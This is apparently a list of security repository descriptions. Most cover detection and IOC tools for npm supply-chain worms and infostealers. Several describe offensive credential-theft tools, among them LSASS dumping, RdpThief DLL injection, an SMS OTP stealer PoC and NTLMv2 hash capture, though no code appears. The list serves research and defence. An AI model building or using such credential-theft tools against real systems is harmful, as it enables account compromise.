Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely

Detect npm packages compromised in the Shai-Hulud 2.0 supply chain attack (Nov 2025). Scans for 790+ malicious packages, suspicious scripts, TruffleHog activity, SHA1HULUD runners, and secrets exfiltration. GitHub Action with SARIF support.

Thumper is an open-source tripwire for the Shai-Hulud npm worm. Plant fake-but-realistic credentials where the worm scans - the instant one is read, you know the box might be breached. Free and built in the open by Jesta.

This repo documents a vulnerability in Siri Shortcuts and Shared Web Credentials (SWC) allowing malformed payloads to persistently execute, trigger retry storms, bypass TLS validation, and request unauthorized entitlements. Confirmed on iOS 18.6.2 with potential iCloud-based propagation.

Android overlay attack & SMS OTP stealer PoC using AccessibilityService — security research only

Runtime dependency-behavior monitor for Node.js. Two engines: in-process telemetry + an out-of-process (strace) trust boundary that sees native egress & persistence. Defense-in-depth for npm supply-chain attacks — SARIF, GitHub Action, zero deps.

Analysis, IOCs, detection rules, and removal scripts for the ChatGPT Plus Free Trial cross-platform info-stealer (macOS + Windows)

Proof of Concept: NTLMv2 Hash Capture via Microsoft Teams onenote:// URI

Forensic dataset + live dashboard for the 2026-04-29 'A Mini Shai-Hulud has Appeared' npm supply-chain worm by TeamPCP. 1,117 dropbox repos, 22 compromised accounts, 47 IOCs across 14 kinds. Trojaned: @cap-js, mbt, @bitwarden/cli. C2 attribution to AS209101 IP Vendetta Inc. JSONL data · kinetic dashboard · CC-BY-4.0.

A DLL injection of RdpThief.dll to perform API hooking and extract RDP credentials

Retrieve user credentials via the Windows API and save them to a file.

This case study documents a stealthy credential-harvesting technique in which the attacker used a lightweight binary (browserdump.exe) to extract stored credentials from browser cache files—specifically Chrome and Edge—without elevating privileges or triggering persistence indicators.

Cross-platform personal browser credential DLP monitor. Linux: fanotify blocking | Windows: NtQueryInfo polling. Blocks infostealers from reading cookies/passwords in real-time.

AD (Active Directory) Service Account Manager is an enterprise-grade PowerShell framework that codifies identity lifecycle management and eliminates identity debt within Active Directory. It transitions organizations away from fragmented, manual service account management into a structured, audited, and automated governance model.

🛡️ SkillsSafe: A security scanner for SKILL.md, MCP configs, and system prompts to detect exfiltration, shell injection, and hidden threats.”

Threat-intel teardown + keyless live tracker of a multi-brand marketplace phishing-as-a-service (PhaaS) operation (Classiscam/Telekopye class) impersonating OLX, Subito, Kleinanzeigen & ~120 brands to steal card data + 3-D Secure/OTP. IOCs, kit analysis, detection signatures.

🛡️ Guard your projects against the Shai-Hulud 2.0 npm supply chain attack with our secure detection tool for safer development.